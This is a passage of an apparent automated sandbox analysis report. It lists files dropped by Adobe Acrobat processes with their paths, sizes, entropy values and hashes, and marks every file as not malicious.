SHA-256: | 0EF9F0F017EA5960F141F7D16518040C09A547C8F084F448C76D159923157D18 |
SHA-512: | 9A4E04622F725BB3BA7EA155FC0DBD390C0A75C0137940329FEE133982EF02F32D4E17A8FB0FDCDA1636A7A70D2AFBBF45CECD673171975C63A45C9DEDCB1F1F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.218635328222608 |
Encrypted: | false |
SSDEEP: | 6:iOW9UN+q2PN72nKuAl9OmbnIFUts9mZmwS9iVkwON72nKuAl9OmbjLJ:7W9NvVaHAahFUts9m/S9a5OaHAaSJ |
MD5: | 31F772E7FCEAB802B83150FA75109B37 |
SHA1: | 1BD7C74258548431F1C6DAFB5C25CB65455360FD |
SHA-256: | 83E52356C24E2498E5BAC1EBB14F02758D54896D7541A97096202C564B4B6B80 |
SHA-512: | 1067768C0EBAA3633A3C0970EFFCBAF200F42958285D6B97F4090C3696E5BF312F7597230751E587BB221C8A59809458B292829A24EC56BBF149A5A4DFC10A93 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.218635328222608 |
Encrypted: | false |
SSDEEP: | 6:iOW9UN+q2PN72nKuAl9OmbnIFUts9mZmwS9iVkwON72nKuAl9OmbjLJ:7W9NvVaHAahFUts9m/S9a5OaHAaSJ |
MD5: | 31F772E7FCEAB802B83150FA75109B37 |
SHA1: | 1BD7C74258548431F1C6DAFB5C25CB65455360FD |
SHA-256: | 83E52356C24E2498E5BAC1EBB14F02758D54896D7541A97096202C564B4B6B80 |
SHA-512: | 1067768C0EBAA3633A3C0970EFFCBAF200F42958285D6B97F4090C3696E5BF312F7597230751E587BB221C8A59809458B292829A24EC56BBF149A5A4DFC10A93 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.110385439621516 |
Encrypted: | false |
SSDEEP: | 6:iOW9KvH34q2PN72nKuAl9Ombzo2jMGIFUts9KVfXVF3JZmwS9KVfXVF3DkwON72g:7W9KvH34vVaHAa8uFUts9K5XVF3J/S9/ |
MD5: | 705414072A21E6D99ADCAEAA29A73539 |
SHA1: | 3B84FFDB2DAB4AED44DF6722EF95E7842307EC06 |
SHA-256: | 44E90F0B250427BF7D2C404A9DD9A04CD956C60E0AA6667312B845017041167D |
SHA-512: | 5CC2CE291B3616E9DDFAEBE809C0C9B9CB39E2647DEA62022ABD405AB4440F718B650C359A8B4151D4C13273EB1C319EEC3C3A2DE0DB70F27DD9324B7E362C0A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.110385439621516 |
Encrypted: | false |
SSDEEP: | 6:iOW9KvH34q2PN72nKuAl9Ombzo2jMGIFUts9KVfXVF3JZmwS9KVfXVF3DkwON72g:7W9KvH34vVaHAa8uFUts9K5XVF3J/S9/ |
MD5: | 705414072A21E6D99ADCAEAA29A73539 |
SHA1: | 3B84FFDB2DAB4AED44DF6722EF95E7842307EC06 |
SHA-256: | 44E90F0B250427BF7D2C404A9DD9A04CD956C60E0AA6667312B845017041167D |
SHA-512: | 5CC2CE291B3616E9DDFAEBE809C0C9B9CB39E2647DEA62022ABD405AB4440F718B650C359A8B4151D4C13273EB1C319EEC3C3A2DE0DB70F27DD9324B7E362C0A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971316048517525 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4T3y:Y2sRdswydMH0r3QYhbA7nby |
MD5: | 035231FF00BD7A50B86047A28DDB114F |
SHA1: | E0E02AC690E2E100699C7AC1E088176EED03E9B8 |
SHA-256: | 08C4EBE72697943DE5D9D89141119694D1D179D58445DB728AEE079AAFD84770 |
SHA-512: | E8DFEB1893A8B3DF483BD11BEB215A7B11846A9EA9627E567381702E3D946808E41F5D86A4F26E6ECE7E3D4CCAEEC9A3471C7B6E49AA1BC39EE22703A0C222AA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF6f2f03.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971316048517525 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4T3y:Y2sRdswydMH0r3QYhbA7nby |
MD5: | 035231FF00BD7A50B86047A28DDB114F |
SHA1: | E0E02AC690E2E100699C7AC1E088176EED03E9B8 |
SHA-256: | 08C4EBE72697943DE5D9D89141119694D1D179D58445DB728AEE079AAFD84770 |
SHA-512: | E8DFEB1893A8B3DF483BD11BEB215A7B11846A9EA9627E567381702E3D946808E41F5D86A4F26E6ECE7E3D4CCAEEC9A3471C7B6E49AA1BC39EE22703A0C222AA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a6e8f25b-0f5a-4358-9abd-6ddd194ed8fe.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.9571833253129 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqmzxsBdOg2HhZcaq3QYiubcP7E4T3y:Y2sRdsXidMHhg3QYhbA7nby |
MD5: | 711CC0540C51B81901551385AE56A9C6 |
SHA1: | 992ECAFAA881693007114FAEFA896C80E27AC925 |
SHA-256: | 2683C312240389652DFB7ABEC5F12B485C416F65147AD68F62EFA9A1EC9590EC |
SHA-512: | 20ED8B72949A7ED5E83010E4CB877DA3D1DDF987F1513FDE0E0D7DBB02303155BE873752A168FE1652522027378E9C6846AFDAA0B703A25CD0A1BE4EE36A6B6E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\dba8034a-f08c-4c82-a951-f7e7d498d5d1.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971316048517525 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4T3y:Y2sRdswydMH0r3QYhbA7nby |
MD5: | 035231FF00BD7A50B86047A28DDB114F |
SHA1: | E0E02AC690E2E100699C7AC1E088176EED03E9B8 |
SHA-256: | 08C4EBE72697943DE5D9D89141119694D1D179D58445DB728AEE079AAFD84770 |
SHA-512: | E8DFEB1893A8B3DF483BD11BEB215A7B11846A9EA9627E567381702E3D946808E41F5D86A4F26E6ECE7E3D4CCAEEC9A3471C7B6E49AA1BC39EE22703A0C222AA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.250891721143355 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7oXbB:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhu |
MD5: | D31C2816B74A008B14AFC5CCB1BB3303 |
SHA1: | 1602539FEED1160A1498780FAEBDC82B2BEF20A2 |
SHA-256: | 77B590F0470AF996232CA11D30B2B4313A784D76B50AA88E8A2C6212BDBDCB99 |
SHA-512: | E3DD0F08C722EFFAD5EEDE9AC97A3E650C1062CBC402C396178410EDC6E093AA103A9BA8F1BDC0BCA163CDE9941B2056938A9366765334C912E70B665CCE30EB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.099048025417244 |
Encrypted: | false |
SSDEEP: | 6:iOW90G/4q2PN72nKuAl9OmbzNMxIFUts9euwF3JZmwS9ZDkwON72nKuAl9OmbzNq:7W9//4vVaHAa8jFUts9fwF3J/S9ZD5OG |
MD5: | 79B9A66D66E99E930E73D993D39C2825 |
SHA1: | 5B725F1A9B3E85BB02A21402B6720DE295B69308 |
SHA-256: | A5B5F17C96623EA63CEBF8133274D73BFED15EAE512BAB05610C74E2DD7D95A6 |
SHA-512: | 29E1CD97713DBBF0FB58AB5D714C1DA57DB4A6D6919C0D8DB63717E98C22AF44F04984B49DD91224652E2BA253B678E93F0AD07F5BE8AAD717108E34678E5143 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.099048025417244 |
Encrypted: | false |
SSDEEP: | 6:iOW90G/4q2PN72nKuAl9OmbzNMxIFUts9euwF3JZmwS9ZDkwON72nKuAl9OmbzNq:7W9//4vVaHAa8jFUts9fwF3J/S9ZD5OG |
MD5: | 79B9A66D66E99E930E73D993D39C2825 |
SHA1: | 5B725F1A9B3E85BB02A21402B6720DE295B69308 |
SHA-256: | A5B5F17C96623EA63CEBF8133274D73BFED15EAE512BAB05610C74E2DD7D95A6 |
SHA-512: | 29E1CD97713DBBF0FB58AB5D714C1DA57DB4A6D6919C0D8DB63717E98C22AF44F04984B49DD91224652E2BA253B678E93F0AD07F5BE8AAD717108E34678E5143 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444597038463892 |
Encrypted: | false |
SSDEEP: | 384:Se6ci5tRiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Gis3OazzU89UTTgUL |
MD5: | 14CB6A46F3FAC4FC4412ECB1937E21C5 |
SHA1: | BE09D138E67B310E42D339401C23BF6C8DAA3C59 |
SHA-256: | D5820EF43E2A770DDFB2CD9E06BA41D64E9586902959B5E3CEFE631DB931FAB8 |
SHA-512: | BCAE57C45B6A37680DC8ABA702AF0445B584C8A22880C6DA354E4A75177DF4C7435D900213AE06C0FC3E815854F252A20622F6637D9462E71AEBEF8D917E540D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.212749817919728 |
Encrypted: | false |
SSDEEP: | 24:7+t2Y7nuwK3qLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9E:7Mb7nC3qPmFTIF3XmHjBoGGR+jMz+LhW |
MD5: | 4EA24ADCB332A8D1C73095AB09989B7C |
SHA1: | 31E7B9FC57FACC12C20566E2DD4A75A14E98CF8C |
SHA-256: | F24F0E5D91DF825E971300DF3ED6781C56D9E20C1B9648B9D64E2BFFCD51A8AF |
SHA-512: | 2C94FF7C7EB0D3BC72B946C986E952DCAE1C09A1A432E3558CB4B5A4F0875EB56D8E070B348750BC2758602F3B5B70288D571A4A7AE79B1110EDD5D0DE4E8BDF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFkljxTilltfllXlE/HT8ktbhlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKL/eT8kbRNMa8RdWBwRd |
MD5: | 1D2F8B3B5D30676A5F1FC71F839D8061 |
SHA1: | 4C344D893545EF48827D81B3F376C97A17B2E69D |
SHA-256: | 72C5C44BEDE1C37A2C34627BA58D80F2B36403E049A3A860C638ACCF84283AF4 |
SHA-512: | D7854150DBA342C9AEBA695A04A4DB147C73539D2C0AB39813F30424FB1FEA45202D323BF40174DEB0A901DB8C82AFC31D5A30BC9F55C610159582568F984F62 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.242990426783058 |
Encrypted: | false |
SSDEEP: | 6:kKevpsL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:WvpsiDImsLNkPlE99SNxAhUe/3 |
MD5: | C19FEF0CF13CA27CD6A2613A2F7ECB3F |
SHA1: | 9445A0B3D0067A646C660E7C55635981DBC55CD5 |
SHA-256: | 91AFA141D1223AFF448311298F8EFDD4311917B468691C1343CAA4C565B47511 |
SHA-512: | 5A1C5A300B398B56B2693D7FC9CF2FAC3BDC124946F2E5DEB97C0839140A21E14E004993738ADB10C1B65DBDC0C37C6EEF7EADE8CF140C930A817794378AF14A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.36519895447367 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJM3g98kUwPeUkwRe9:YvXKX90eGcbwZGMbLUkee9 |
MD5: | 00F0DFF21825941DB8EB5ADEFE163B4C |
SHA1: | 3B105688C5A455C2B40B9A12480CB0A092C197B0 |
SHA-256: | 68E37C99B249019BE1754700080BE6CB0C3B43EB578ECC3B9C13BA18C5925A87 |
SHA-512: | 2274052289BF320D836E1089D5FDA0B3D482E44EBA8AE373B3D1265EE33E9452150F71AE47D1F8C10AAE6436831FF4D2DB62B4CB2E7EA67922C4C0B7600B8806 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.319571746151566 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfBoTfXpnrPeUkwRe9:YvXKX90eGcbwZGWTfXcUkee9 |
MD5: | DBA7F73AF2B5FCF1CC26A282AD99733A |
SHA1: | E46F1966583836270DE2E0C0BC1A5255E57A0BE6 |
SHA-256: | 5B0CC5C8C92F7008F0383265E30E0EEBAB11CD54226BE3370CF969CE3FF64864 |
SHA-512: | BF1C3F0DF1B4FCBCB162A78D2FD506F3B411D9D3AE116D38C9F0B2CD4C84C667BB76B05D469EF7F53FC75836164AB572E75AF39081F232C797F843176AD1DEFB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.297524346150926 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfBD2G6UpnrPeUkwRe9:YvXKX90eGcbwZGR22cUkee9 |
MD5: | C36284A5FDC854BA61326AE9B6BD3E41 |
SHA1: | 8745261496E68748928EA4879F1AE5255848FCC6 |
SHA-256: | 1F5F73FC946D8D02B793B142F9387D64B29A77910DAC8279C9FF0F2750357662 |
SHA-512: | 37FC5979457EDC03F6F76BC76FC7CE7543E1CF91523EA6F41E5E4B1F103F25CC3730DA86DE659AA021AC5A07731B57148384634894C34C0E41D94D24C69631E1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.345285936037835 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfPmwrPeUkwRe9:YvXKX90eGcbwZGH56Ukee9 |
MD5: | 01329757ADA338200122130BA8297FBC |
SHA1: | 2728AD6849980257DEF8F86141D66609A613E3D4 |
SHA-256: | 285D1B3851F1A4C59EAA591177E8D5D59926C79BE2E737CE68059F8F829B30F7 |
SHA-512: | 5DA02863CA219E2F82DF1049F3E4B4499FB2B9D3651DA5955130333A518046EC2113D03EA0C90E36CD506825657E147A6865800E66AF25378287DB2B662AFA1A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.693979650464945 |
Encrypted: | false |
SSDEEP: | 24:Yv6XqYs+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSI:Yvn+hgy6SAFv5Ah8cv/I |
MD5: | FFCF8964EE35E4377D5C7F3E53C2F390 |
SHA1: | E5218B8466A541FC868A8AEEF5E93F630D2C976F |
SHA-256: | 0628ACB6FA8381392771E55D1E7EA325AA962D3D6E5974F00889D4FA964A7858 |
SHA-512: | 5A87636952F7B31CC423940CD7E8D06D6B7E101098AFF70C49816173FC684A8DB94B5CF130E29A79D0045DC24A28CA2596D85E897E8907AE7182C5914812728E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.297594607561428 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJf8dPeUkwRe9:YvXKX90eGcbwZGU8Ukee9 |
MD5: | E53A9227667E1E1D08BA1532D7515693 |
SHA1: | 079C984951ADBF14D07631DCF8B869D06AAF7076 |
SHA-256: | 709919A6D8D3A98A48DF588FF8BEEF3A1AFB7388FF2379B7784FE407B9D54AE7 |
SHA-512: | 5CFC652F263561DC0A1C7488315B582E70256B356908C34404D99505DA1CACC9F99B355492CA4E9C190113196F697B49E3FF923D8B2DDB8E6F9AA3E99C6DA5DC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.300871369417095 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfQ1rPeUkwRe9:YvXKX90eGcbwZGY16Ukee9 |
MD5: | 11CF75DF2CBC50BE32BC1630E571B081 |
SHA1: | 5256C98912A4DC5291D97309933983A4676B8A23 |
SHA-256: | 48388017E8E1A10854D80CA551B21E5CC6D63E1B622A4849F2519B58A17DA9BC |
SHA-512: | 53EE55191B9B299F53E23FE155EA52A9D7B5BB1A5D32002772BE140D141D164ADAC271A8764E3CB66A2D26FDE8A580ACB47EE90089FA2E702EDF87FC64E3F153 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.309084315998594 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfFldPeUkwRe9:YvXKX90eGcbwZGz8Ukee9 |
MD5: | D475FC2C84B2F5781FFD4284CCD4B91B |
SHA1: | D09EFC9AA2CA26B57340AC16B19DB7162CE33C48 |
SHA-256: | EDB6C772DCDF61A01FF92BCC88809BE5BE612A20D87F81B56D42C72DCD70E00B |
SHA-512: | 07E12ECF69E204DC9B29BDAD795E09EED9486E53F2DEA6EC5DE71D126E1F42127E99B4F1DE53E10F3B177A2C08AAFFB10588E97B96622C56BD4F5884D5B2FAA4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.324913794816429 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfzdPeUkwRe9:YvXKX90eGcbwZGb8Ukee9 |
MD5: | 6DA2BBDC6FA7AAC138F8DD6743A2BFE1 |
SHA1: | 07C471C4DFD9394ACCAB566F8BAB87CFCA1A0373 |
SHA-256: | CF38E8D0073E344DC1FB8F8F3CB5F70F4668BAFB7DFDAB6B683488E65FAF29EC |
SHA-512: | 7806C2D2307E4A6C61A3A02BD2A89E6DA6B612C8D1C0AB3DA3A7EEE9170D848CEB22CD8E5763CD14D8AAE5DABA52E2A5EACFAB94BF1B39D552CF912E878E5259 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
